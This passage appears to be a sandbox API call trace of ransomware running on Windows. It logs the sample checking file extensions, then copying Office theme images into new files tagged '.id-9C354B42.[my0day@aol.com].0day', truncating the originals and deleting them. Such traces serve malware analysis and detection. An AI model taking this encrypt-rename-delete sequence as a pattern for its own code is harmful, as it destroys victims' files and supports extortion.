(lpString=".pdf") returned 4 [0047.248] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.248] lstrlenW (lpString=".xls") returned 4 [0047.248] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.248] lstrlenW (lpString=".xlsx") returned 5 [0047.248] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.248] lstrlenW (lpString=".ppt") returned 4 [0047.248] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0047.248] lstrlenW (lpString=".zip") returned 4 [0047.248] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.248] lstrlenW (lpString=".rar") returned 4 [0047.248] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.248] lstrlenW (lpString=".bz2") returned 4 [0047.248] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.248] lstrlenW (lpString=".7z") returned 3 [0047.248] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0047.248] lstrlenW (lpString=".dbf") returned 4 [0047.248] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0047.248] lstrlenW (lpString=".1cd") returned 4 [0047.248] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0047.248] lstrlenW (lpString=".jpg") returned 4 [0047.248] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0047.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0047.249] lstrlenW (lpString=".doc") returned 4 [0047.249] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.249] lstrlenW (lpString=".docx") returned 5 [0047.249] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.249] lstrlenW (lpString=".pdf") returned 4 [0047.249] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.249] lstrlenW (lpString=".xls") returned 4 [0047.249] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.249] lstrlenW (lpString=".xlsx") returned 5 [0047.249] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.249] lstrlenW (lpString=".ppt") returned 4 [0047.249] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0047.249] lstrlenW (lpString=".zip") returned 4 [0047.249] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.249] lstrlenW (lpString=".rar") returned 4 [0047.249] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.249] lstrlenW (lpString=".bz2") returned 4 [0047.249] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.249] lstrlenW (lpString=".7z") returned 3 [0047.249] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0047.249] lstrlenW (lpString=".dbf") returned 4 [0047.249] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0047.249] lstrlenW (lpString=".1cd") returned 4 [0047.249] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RMNSQUE\\THMBNAIL.PNG") returned 76 [0047.249] lstrlenW (lpString=".jpg") returned 4 [0047.249] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.250] lstrcmpiW (lpString1=".PNG", lpString2=".0day") returned 1 [0047.250] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0047.250] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0047.354] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=34163) returned 1 [0047.354] CloseHandle (hObject=0x208) returned 1 [0047.354] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png")) returned 0x20 [0047.354] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0047.354] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0047.354] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.354] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.354] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0047.355] GetLastError () returned 0x0 [0047.355] ReadFile (in: hFile=0x208, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x8573, lpOverlapped=0x0) returned 1 [0047.400] WriteFile (in: hFile=0x1a8, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x8580, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x8580, lpOverlapped=0x0) returned 1 [0047.402] ReadFile (in: hFile=0x208, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0047.402] WriteFile (in: hFile=0x1a8, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.402] SetEndOfFile (hFile=0x1a8) returned 1 [0047.402] CloseHandle (hObject=0x1a8) returned 1 [0047.402] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.402] SetEndOfFile (hFile=0x208) returned 1 [0047.403] CloseHandle (hObject=0x208) returned 1 [0047.403] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0047.403] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\satin\\thmbnail.png")) returned 1 [0047.404] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0047.404] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0047.404] lstrlenW (lpString=".doc") returned 4 [0047.404] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.404] lstrlenW (lpString=".docx") returned 5 [0047.404] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.404] lstrlenW (lpString=".pdf") returned 4 [0047.404] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.404] lstrlenW (lpString=".xls") returned 4 [0047.404] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.404] lstrlenW (lpString=".xlsx") returned 5 [0047.404] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.404] lstrlenW (lpString=".ppt") returned 4 [0047.404] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.404] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0047.404] lstrlenW (lpString=".zip") returned 4 [0047.404] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.404] lstrlenW (lpString=".rar") returned 4 [0047.404] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.404] lstrlenW (lpString=".bz2") returned 4 [0047.404] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.404] lstrlenW (lpString=".7z") returned 3 [0047.404] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.404] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0047.404] lstrlenW (lpString=".dbf") returned 4 [0047.404] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.404] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0047.404] lstrlenW (lpString=".1cd") returned 4 [0047.404] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.404] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0047.404] lstrlenW (lpString=".jpg") returned 4 [0047.404] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.405] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0047.405] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0047.405] lstrlenW (lpString=".doc") returned 4 [0047.405] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0047.405] lstrlenW (lpString=".docx") returned 5 [0047.405] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0047.405] lstrlenW (lpString=".pdf") returned 4 [0047.405] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0047.405] lstrlenW (lpString=".xls") returned 4 [0047.405] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0047.405] lstrlenW (lpString=".xlsx") returned 5 [0047.405] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0047.405] lstrlenW (lpString=".ppt") returned 4 [0047.405] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0047.405] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0047.405] lstrlenW (lpString=".zip") returned 4 [0047.405] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0047.405] lstrlenW (lpString=".rar") returned 4 [0047.405] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0047.405] lstrlenW (lpString=".bz2") returned 4 [0047.405] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0047.405] lstrlenW (lpString=".7z") returned 3 [0047.405] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0047.405] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0047.405] lstrlenW (lpString=".dbf") returned 4 [0047.405] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0047.405] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0047.405] lstrlenW (lpString=".1cd") returned 4 [0047.405] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0047.405] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SATIN\\THMBNAIL.PNG") returned 74 [0047.405] lstrlenW (lpString=".jpg") returned 4 [0047.405] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0047.406] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0047.406] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.406] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0047.406] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=2527) returned 1 [0047.406] CloseHandle (hObject=0x208) returned 1 [0047.406] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif")) returned 0x20 [0047.406] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0047.406] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0047.406] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.406] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.406] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0047.417] GetLastError () returned 0x0 [0047.418] ReadFile (in: hFile=0x208, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x9df, lpOverlapped=0x0) returned 1 [0047.419] WriteFile (in: hFile=0x210, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x9e0, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x9e0, lpOverlapped=0x0) returned 1 [0047.420] ReadFile (in: hFile=0x208, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0047.420] WriteFile (in: hFile=0x210, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.420] SetEndOfFile (hFile=0x210) returned 1 [0047.420] CloseHandle (hObject=0x210) returned 1 [0047.420] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.420] SetEndOfFile (hFile=0x208) returned 1 [0047.421] CloseHandle (hObject=0x208) returned 1 [0047.421] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0047.421] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif")) returned 1 [0047.421] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0047.421] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0047.422] lstrlenW (lpString=".doc") returned 4 [0047.422] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.422] lstrlenW (lpString=".docx") returned 5 [0047.422] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.422] lstrlenW (lpString=".pdf") returned 4 [0047.422] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.422] lstrlenW (lpString=".xls") returned 4 [0047.422] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.422] lstrlenW (lpString=".xlsx") returned 5 [0047.422] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.422] lstrlenW (lpString=".ppt") returned 4 [0047.422] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.422] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0047.422] lstrlenW (lpString=".zip") returned 4 [0047.422] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.422] lstrlenW (lpString=".rar") returned 4 [0047.422] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.422] lstrlenW (lpString=".bz2") returned 4 [0047.422] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.422] lstrlenW (lpString=".7z") returned 3 [0047.422] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.422] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0047.422] lstrlenW (lpString=".dbf") returned 4 [0047.422] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.422] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0047.423] lstrlenW (lpString=".1cd") returned 4 [0047.423] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0047.423] lstrlenW (lpString=".jpg") returned 4 [0047.423] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0047.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0047.423] lstrlenW (lpString=".doc") returned 4 [0047.423] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.423] lstrlenW (lpString=".docx") returned 5 [0047.423] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.423] lstrlenW (lpString=".pdf") returned 4 [0047.423] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.423] lstrlenW (lpString=".xls") returned 4 [0047.423] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0047.423] lstrlenW (lpString=".xlsx") returned 5 [0047.423] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0047.423] lstrlenW (lpString=".ppt") returned 4 [0047.423] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0047.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0047.423] lstrlenW (lpString=".zip") returned 4 [0047.423] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0047.423] lstrlenW (lpString=".rar") returned 4 [0047.423] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0047.423] lstrlenW (lpString=".bz2") returned 4 [0047.423] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0047.423] lstrlenW (lpString=".7z") returned 3 [0047.423] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0047.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0047.423] lstrlenW (lpString=".dbf") returned 4 [0047.423] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0047.424] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0047.424] lstrlenW (lpString=".1cd") returned 4 [0047.424] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0047.424] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0047.424] lstrlenW (lpString=".jpg") returned 4 [0047.424] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0047.424] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0047.424] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0047.424] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0047.424] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=1737) returned 1 [0047.424] CloseHandle (hObject=0x208) returned 1 [0047.424] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif")) returned 0x20 [0047.424] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0047.424] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0047.425] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.425] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.425] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0047.426] GetLastError () returned 0x0 [0047.426] ReadFile (in: hFile=0x208, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x6c9, lpOverlapped=0x0) returned 1 [0047.428] WriteFile (in: hFile=0x1a8, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x6d0, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x6d0, lpOverlapped=0x0) returned 1 [0047.429] ReadFile (in: hFile=0x208, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0047.429] WriteFile (in: hFile=0x1a8, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.429] SetEndOfFile (hFile=0x1a8) returned 1 [0047.429] CloseHandle (hObject=0x1a8) returned 1 [0047.430] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.430] SetEndOfFile (hFile=0x208) returned 1 [0047.430] CloseHandle (hObject=0x208) returned 1 [0047.430] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0047.431] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\strtedge\\preview.gif")) returned 1 [0047.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0047.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STRTEDGE\\PREVIEW.GIF") returned 76 [0047.431] lstrlenW (lpString=".doc") returned 4 [0047.431] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0047.431] lstrlenW (lpString=".docx") returned 5 [0047.431] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0047.431] lstrlenW (lpString=".pdf") returned 4 [0047.431] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0047.431] lstrlenW (lpString=".xls") returned 4 [0047.431] lstrcmpiW 